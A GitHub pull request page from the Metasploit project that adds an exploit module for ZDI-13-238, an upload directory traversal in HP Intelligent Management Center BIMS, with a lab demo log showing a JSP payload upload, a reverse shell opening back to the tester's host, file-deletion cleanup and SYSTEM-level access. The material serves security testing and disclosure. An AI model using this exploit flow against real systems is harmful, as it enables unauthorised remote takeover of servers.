Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for ZDI-13-238 #2550

Merged
merged 4 commits into from Oct 21, 2013
Merged

Add module for ZDI-13-238 #2550

merged 4 commits into from Oct 21, 2013

Conversation

jvazquez-r7
Copy link
Contributor

HP Intelligent Management Center with BIMS 5.2 E0401 on Windows 2003 SP2.

Validation

DEMO

  msf > use exploit/windows/http/hp_imc_bims_upload
smsf exploit(hp_imc_bims_upload) > set rhost 192.168.172.136
rhost => 192.168.172.136
msf exploit(hp_imc_bims_upload) > check
[+] The target is vulnerable.
msf exploit(hp_imc_bims_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.136:8080 - Uploading the JSP payload...
[*] 192.168.172.136:8080 - JSP payload uploaded successfully
[*] 192.168.172.136:8080 - Executing payload...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.136:3875) at 2013-10-19 00:06:01 -0500
[+] Deleted ..\web\apps\upload\vmU4G4OQIwm8.jsp

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\iMC\client\bin>echo 3372204887;echo cYrFRdPCeLbuzRHnAGPpDBtyinYCnJYE
3372204887;echo cYrFRdPCeLbuzRHnAGPpDBtyinYCnJYE

C:\Program Files\iMC\client\bin>attrib.exe -r "..\web\apps\upload\vmU4G4OQIwm8.jsp" ; del.exe /f /q "..\web\apps\upload\vmU4G4OQIwm8.jsp" ; rm -f "..\web\apps\upload\vmU4G4OQIwm8.jsp" >/dev/null;echo KzqGldxkdRKDPeYySFaIleGyGLkIwkNX

C:\Program Files\iMC\client\bin>whoami
whoami
nt authority\system

C:\Program Files\iMC\client\bin>

@jvazquez-r7
Copy link
Contributor Author

Btw, while working on this exploit discovered a bug on FileDropper when using shell sessions on windows, attrib looks like failing when concatenating the deletion commands.

Filled bug at https://dev.metasploit.com/redmine/issues/8510

Will also give a chance by myself, but not today :P

wchen-r7 added a commit that referenced this pull request Oct 21, 2013
@wchen-r7
Land #2550 - Add HP Intelligent Managemetn UploadServlet dir traversal
8c05f8c
@wchen-r7 wchen-r7 merged commit 27078eb into rapid7:master Oct 21, 2013
@jvazquez-r7 jvazquez-r7 deleted the hp_imc_bims_upload branch November 18, 2014 15:49
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@jvazquez-r7 @wchen-r7